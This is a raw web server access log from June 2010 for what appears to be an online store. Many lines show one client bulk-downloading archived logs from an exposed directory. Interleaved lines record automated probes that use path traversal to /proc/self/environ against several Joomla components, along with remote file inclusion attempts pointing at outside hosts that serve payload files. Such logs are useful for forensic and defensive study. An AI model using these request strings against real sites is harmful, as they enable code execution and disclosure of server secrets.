178.63.49.142 - - [21/Jun/2010:02:07:13 -0400] "GET /logs/access_log.Q109051400 HTTP/1.1" 200 6017281 "http://www.aceonlinestore.com/logs/access_log.Q109051400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:07:13 -0400] "GET /logs/access_log.Q109051600 HTTP/1.1" 200 2853952 "http://www.aceonlinestore.com/logs/access_log.Q109051600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:07:13 -0400] "GET /logs/access_log.Q109051300 HTTP/1.1" 200 5889638 "http://www.aceonlinestore.com/logs/access_log.Q109051300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:07:13 -0400] "GET /logs/access_log.Q109050900 HTTP/1.1" 200 3163151 "http://www.aceonlinestore.com/logs/access_log.Q109050900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:07:13 -0400] "GET /logs/access_log.Q109051200 HTTP/1.1" 200 6040641 "http://www.aceonlinestore.com/logs/access_log.Q109051200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:07:13 -0400] "GET /logs/access_log.Q109050800 HTTP/1.1" 200 5406893 "http://www.aceonlinestore.com/logs/access_log.Q109050800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:07:13 -0400] "GET /logs/access_log.Q109051100 HTTP/1.1" 200 5205411 "http://www.aceonlinestore.com/logs/access_log.Q109051100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:07:13 -0400] "GET /logs/access_log.Q109051000 HTTP/1.1" 200 3272696 "http://www.aceonlinestore.com/logs/access_log.Q109051000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:07:13 -0400] "GET /logs/access_log.Q109051700 HTTP/1.1" 200 2276726 "http://www.aceonlinestore.com/logs/access_log.Q109051700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:07:13 -0400] "GET /logs/access_log.Q109051500 HTTP/1.1" 200 6117848 "http://www.aceonlinestore.com/logs/access_log.Q109051500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
95.215.0.123 - - [21/Jun/2010:02:08:41 -0400] "GET //bbs//write_comment_update.php?board_skin_path=http://www.seekalodge.com/language/pdf_fonts/myid.jpg? HTTP/1.1" 404 228 "-" "libwww-perl/5.834"
67.15.152.183 - - [21/Jun/2010:02:08:56 -0400] "GET /logs/access_log.Q110061300//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:02:08:56 -0400] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:02:08:56 -0400] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
203.211.129.97 - - [21/Jun/2010:02:09:00 -0400] "GET /logs/access_log.Q110061500//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.831"
203.211.149.167 - - [21/Jun/2010:02:09:09 -0400] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.831"
203.211.149.167 - - [21/Jun/2010:02:09:10 -0400] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.831"
178.63.49.142 - - [21/Jun/2010:02:08:12 -0400] "GET /logs/access_log.Q109052000 HTTP/1.1" 200 5825651 "http://www.aceonlinestore.com/logs/access_log.Q109052000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:08:12 -0400] "GET /logs/access_log.Q109051800 HTTP/1.1" 200 5218469 "http://www.aceonlinestore.com/logs/access_log.Q109051800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:08:12 -0400] "GET /logs/access_log.Q109052400 HTTP/1.1" 200 2479154 "http://www.aceonlinestore.com/logs/access_log.Q109052400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:08:12 -0400] "GET /logs/access_log.Q109052500 HTTP/1.1" 200 2746180 "http://www.aceonlinestore.com/logs/access_log.Q109052500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:08:12 -0400] "GET /logs/access_log.Q109052200 HTTP/1.1" 200 4757864 "http://www.aceonlinestore.com/logs/access_log.Q109052200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:08:12 -0400] "GET /logs/access_log.Q109052700 HTTP/1.1" 200 4217417 "http://www.aceonlinestore.com/logs/access_log.Q109052700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:08:12 -0400] "GET /logs/access_log.Q109052600 HTTP/1.1" 200 4651429 "http://www.aceonlinestore.com/logs/access_log.Q109052600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:08:12 -0400] "GET /logs/access_log.Q109051900 HTTP/1.1" 200 5938231 "http://www.aceonlinestore.com/logs/access_log.Q109051900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:08:12 -0400] "GET /logs/access_log.Q109052300 HTTP/1.1" 200 2758218 "http://www.aceonlinestore.com/logs/access_log.Q109052300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:08:12 -0400] "GET /logs/access_log.Q109052100 HTTP/1.1" 200 5038627 "http://www.aceonlinestore.com/logs/access_log.Q109052100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
67.15.152.183 - - [21/Jun/2010:02:09:28 -0400] "GET /logs/access_log.Q110061300//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:02:09:29 -0400] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:02:09:29 -0400] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
216.17.105.143 - - [21/Jun/2010:02:09:37 -0400] "GET /logs/access_log.Q110052800/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.830"
178.63.49.142 - - [21/Jun/2010:02:09:13 -0400] "GET /logs/access_log.Q109060500 HTTP/1.1" 200 3718537 "http://www.aceonlinestore.com/logs/access_log.Q109060500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:09:13 -0400] "GET /logs/access_log.Q109052800 HTTP/1.1" 200 4403369 "http://www.aceonlinestore.com/logs/access_log.Q109052800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:09:13 -0400] "GET /logs/access_log.Q109060300 HTTP/1.1" 200 3991095 "http://www.aceonlinestore.com/logs/access_log.Q109060300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:09:13 -0400] "GET /logs/access_log.Q109053100 HTTP/1.1" 200 1986553 "http://www.aceonlinestore.com/logs/access_log.Q109053100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:09:13 -0400] "GET /logs/access_log.Q109060100 HTTP/1.1" 200 4231911 "http://www.aceonlinestore.com/logs/access_log.Q109060100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:09:13 -0400] "GET /logs/access_log.Q109052900 HTTP/1.1" 200 4356729 "http://www.aceonlinestore.com/logs/access_log.Q109052900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:09:13 -0400] "GET /logs/access_log.Q109060600 HTTP/1.1" 200 2519002 "http://www.aceonlinestore.com/logs/access_log.Q109060600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:09:13 -0400] "GET /logs/access_log.Q109060200 HTTP/1.1" 200 4890211 "http://www.aceonlinestore.com/logs/access_log.Q109060200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:09:13 -0400] "GET /logs/access_log.Q109060400 HTTP/1.1" 200 4467320 "http://www.aceonlinestore.com/logs/access_log.Q109060400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:09:13 -0400] "GET /logs/access_log.Q109053000 HTTP/1.1" 200 2289625 "http://www.aceonlinestore.com/logs/access_log.Q109053000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
202.125.152.246 - - [21/Jun/2010:02:10:32 -0400] "GET /logs/access_log.Q109082000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
202.125.152.246 - - [21/Jun/2010:02:10:32 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
178.63.49.142 - - [21/Jun/2010:02:10:13 -0400] "GET /logs/access_log.Q109053100 HTTP/1.1" 200 1986553 "http://www.aceonlinestore.com/logs/access_log.Q109053100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
202.125.152.246 - - [21/Jun/2010:02:10:39 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
95.215.0.123 - - [21/Jun/2010:02:10:50 -0400] "GET /logs/access_log.Q110020800//bbs//write_comment_update.php?board_skin_path=http://mgquadro.fileave.com/fz1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
95.215.0.123 - - [21/Jun/2010:02:10:50 -0400] "GET //bbs//write_comment_update.php?board_skin_path=http://mgquadro.fileave.com/fz1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
95.215.0.123 - - [21/Jun/2010:02:10:50 -0400] "GET /logs/error_log.Q110020800//bbs//write_comment_update.php?board_skin_path=http://mgquadro.fileave.com/fz1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
95.215.0.123 - - [21/Jun/2010:02:10:50 -0400] "GET /logs//bbs//write_comment_update.php?board_skin_path=http://mgquadro.fileave.com/fz1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
188.72.70.56 - - [21/Jun/2010:02:11:10 -0400] "GET /logs/error_log.Q110061400//index2.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:02:11:11 -0400] "GET //index2.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:02:11:11 -0400] "GET /logs//index2.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 214 "-" "libwww-perl/5.834"
67.195.114.223 - - [21/Jun/2010:02:10:16 -0400] "GET /logs/access_log.Q110040300 HTTP/1.0" 200 3621993 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
188.72.70.56 - - [21/Jun/2010:02:11:18 -0400] "GET /logs/error_log.Q110052800//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:02:11:18 -0400] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:02:11:18 -0400] "GET /logs//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 214 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:02:11:36 -0400] "GET /logs/error_log.Q110052800//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:02:11:36 -0400] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:02:11:36 -0400] "GET /logs//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 214 "-" "libwww-perl/5.834"
178.63.49.142 - - [21/Jun/2010:02:10:47 -0400] "GET /logs/access_log.Q109061500 HTTP/1.1" 200 5178745 "http://www.aceonlinestore.com/logs/access_log.Q109061500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:10:47 -0400] "GET /logs/access_log.Q109060900 HTTP/1.1" 200 4908335 "http://www.aceonlinestore.com/logs/access_log.Q109060900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:10:47 -0400] "GET /logs/access_log.Q109061300 HTTP/1.1" 200 2008810 "http://www.aceonlinestore.com/logs/access_log.Q109061300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:10:47 -0400] "GET /logs/access_log.Q109060800 HTTP/1.1" 200 4780020 "http://www.aceonlinestore.com/logs/access_log.Q109060800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:10:47 -0400] "GET /logs/access_log.Q109061200 HTTP/1.1" 200 4908958 "http://www.aceonlinestore.com/logs/access_log.Q109061200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:10:47 -0400] "GET /logs/access_log.Q109061100 HTTP/1.1" 200 4824283 "http://www.aceonlinestore.com/logs/access_log.Q109061100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:10:47 -0400] "GET /logs/access_log.Q109060700 HTTP/1.1" 200 2068562 "http://www.aceonlinestore.com/logs/access_log.Q109060700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:10:47 -0400] "GET /logs/access_log.Q109061400 HTTP/1.1" 200 2160115 "http://www.aceonlinestore.com/logs/access_log.Q109061400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:10:47 -0400] "GET /logs/access_log.Q109061600 HTTP/1.1" 200 5728303 "http://www.aceonlinestore.com/logs/access_log.Q109061600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:10:47 -0400] "GET /logs/access_log.Q109061000 HTTP/1.1" 200 4425432 "http://www.aceonlinestore.com/logs/access_log.Q109061000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
209.216.242.123 - - [21/Jun/2010:02:11:50 -0400] "GET /logs/access_log.Q110050600////////?mosConfig_absolute_path=http://www.annapurnaeverest.com/language/en-US/byz9991.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
209.216.242.123 - - [21/Jun/2010:02:11:51 -0400] "GET /logs/access_log.Q110010400////////?mosConfig_absolute_path=http://www.annapurnaeverest.com/language/en-US/byz9991.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
66.249.71.206 - - [21/Jun/2010:02:12:01 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L11516E5701218500102B093+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
178.63.49.142 - - [21/Jun/2010:02:11:48 -0400] "GET /logs/access_log.Q109061300 HTTP/1.1" 200 2008810 "http://www.aceonlinestore.com/logs/access_log.Q109061300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:11:48 -0400] "GET /logs/access_log.Q109060700 HTTP/1.1" 200 2068562 "http://www.aceonlinestore.com/logs/access_log.Q109060700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
203.211.149.167 - - [21/Jun/2010:02:12:13 -0400] "GET /logs/error_log.Q110053000/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.831"
203.211.149.167 - - [21/Jun/2010:02:12:13 -0400] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.831"
203.211.149.167 - - [21/Jun/2010:02:12:14 -0400] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.831"
209.59.12.99 - - [21/Jun/2010:02:12:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.211.149.167 - - [21/Jun/2010:02:12:35 -0400] "GET /logs/error_log.Q110053000/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.831"
203.211.149.167 - - [21/Jun/2010:02:12:36 -0400] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.831"
203.211.149.167 - - [21/Jun/2010:02:12:37 -0400] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.831"
202.125.152.246 - - [21/Jun/2010:02:12:40 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
202.125.152.246 - - [21/Jun/2010:02:12:40 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
203.211.149.167 - - [21/Jun/2010:02:12:41 -0400] "GET /logs/access_log.Q110060600/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.831"
202.125.152.246 - - [21/Jun/2010:02:12:48 -0400] "GET /logs/access_log.Q109082000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
95.215.0.123 - - [21/Jun/2010:02:12:58 -0400] "GET /logs/error_log.Q110020800//bbs//write_comment_update.php?board_skin_path=http://www.seekalodge.com/language/pdf_fonts/myid.jpg? HTTP/1.1" 404 254 "-" "libwww-perl/5.834"
95.215.0.123 - - [21/Jun/2010:02:12:58 -0400] "GET //bbs//write_comment_update.php?board_skin_path=http://www.seekalodge.com/language/pdf_fonts/myid.jpg? HTTP/1.1" 404 228 "-" "libwww-perl/5.834"
95.215.0.123 - - [21/Jun/2010:02:12:59 -0400] "GET /logs//bbs//write_comment_update.php?board_skin_path=http://www.seekalodge.com/language/pdf_fonts/myid.jpg? HTTP/1.1" 404 233 "-" "libwww-perl/5.834"
203.211.149.167 - - [21/Jun/2010:02:12:59 -0400] "GET /logs/access_log.Q110060600/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.831"
202.125.152.246 - - [21/Jun/2010:02:13:03 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
202.125.152.246 - - [21/Jun/2010:02:13:03 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
178.63.49.142 - - [21/Jun/2010:02:12:13 -0400] "GET /logs/access_log.Q109061700 HTTP/1.1" 200 4385823 "http://www.aceonlinestore.com/logs/access_log.Q109061700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:12:13 -0400] "GET /logs/access_log.Q109062100 HTTP/1.1" 200 1659218 "http://www.aceonlinestore.com/logs/access_log.Q109062100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:12:13 -0400] "GET /logs/access_log.Q109062000 HTTP/1.1" 200 2302740 "http://www.aceonlinestore.com/logs/access_log.Q109062000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:12:13 -0400] "GET /logs/access_log.Q109062600 HTTP/1.1" 200 4172484 "http://www.aceonlinestore.com/logs/access_log.Q109062600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:12:13 -0400] "GET /logs/access_log.Q109062500 HTTP/1.1" 200 5016688 "http://www.aceonlinestore.com/logs/access_log.Q109062500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:12:13 -0400] "GET /logs/access_log.Q109062200 HTTP/1.1" 200 4929791 "http://www.aceonlinestore.com/logs/access_log.Q109062200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:12:13 -0400] "GET /logs/access_log.Q109061800 HTTP/1.1" 200 4635924 "http://www.aceonlinestore.com/logs/access_log.Q109061800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:12:13 -0400] "GET /logs/access_log.Q109061900 HTTP/1.1" 200 3745986 "http://www.aceonlinestore.com/logs/access_log.Q109061900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:12:13 -0400] "GET /logs/access_log.Q109062400 HTTP/1.1" 200 4898892 "http://www.aceonlinestore.com/logs/access_log.Q109062400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:12:13 -0400] "GET /logs/access_log.Q109062300 HTTP/1.1" 200 5026682 "http://www.aceonlinestore.com/logs/access_log.Q109062300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
202.125.152.246 - - [21/Jun/2010:02:13:22 -0400] "GET /logs/access_log.Q109082000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
95.215.0.123 - - [21/Jun/2010:02:13:35 -0400] "GET /logs/access_log.Q110020800//bbs//write_comment_update.php?board_skin_path=http://www.seekalodge.com/language/pdf_fonts/myid.jpg? HTTP/1.1" 404 255 "-" "libwww-perl/5.834"
178.63.49.142 - - [21/Jun/2010:02:13:13 -0400] "GET /logs/access_log.Q109062100 HTTP/1.1" 200 1659218 "http://www.aceonlinestore.com/logs/access_log.Q109062100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
67.15.152.183 - - [21/Jun/2010:02:14:13 -0400] "GET /logs/access_log.Q110061500//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:02:14:13 -0400] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:02:14:13 -0400] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
178.63.49.142 - - [21/Jun/2010:02:13:41 -0400] "GET /logs/access_log.Q109070400 HTTP/1.1" 200 1764892 "http://www.aceonlinestore.com/logs/access_log.Q109070400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:13:41 -0400] "GET /logs/access_log.Q109070500 HTTP/1.1" 200 2033988 "http://www.aceonlinestore.com/logs/access_log.Q109070500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:13:41 -0400] "GET /logs/access_log.Q109070100 HTTP/1.1" 200 4008187 "http://www.aceonlinestore.com/logs/access_log.Q109070100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:13:41 -0400] "GET /logs/access_log.Q109070600 HTTP/1.1" 200 4677677 "http://www.aceonlinestore.com/logs/access_log.Q109070600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:13:41 -0400] "GET /logs/access_log.Q109070300 HTTP/1.1" 200 3011957 "http://www.aceonlinestore.com/logs/access_log.Q109070300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:13:41 -0400] "GET /logs/access_log.Q109062700 HTTP/1.1" 200 2243190 "http://www.aceonlinestore.com/logs/access_log.Q109062700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:13:41 -0400] "GET /logs/access_log.Q109070200 HTTP/1.1" 200 5653087 "http://www.aceonlinestore.com/logs/access_log.Q109070200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:13:41 -0400] "GET /logs/access_log.Q109062800 HTTP/1.1" 200 2206435 "http://www.aceonlinestore.com/logs/access_log.Q109062800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
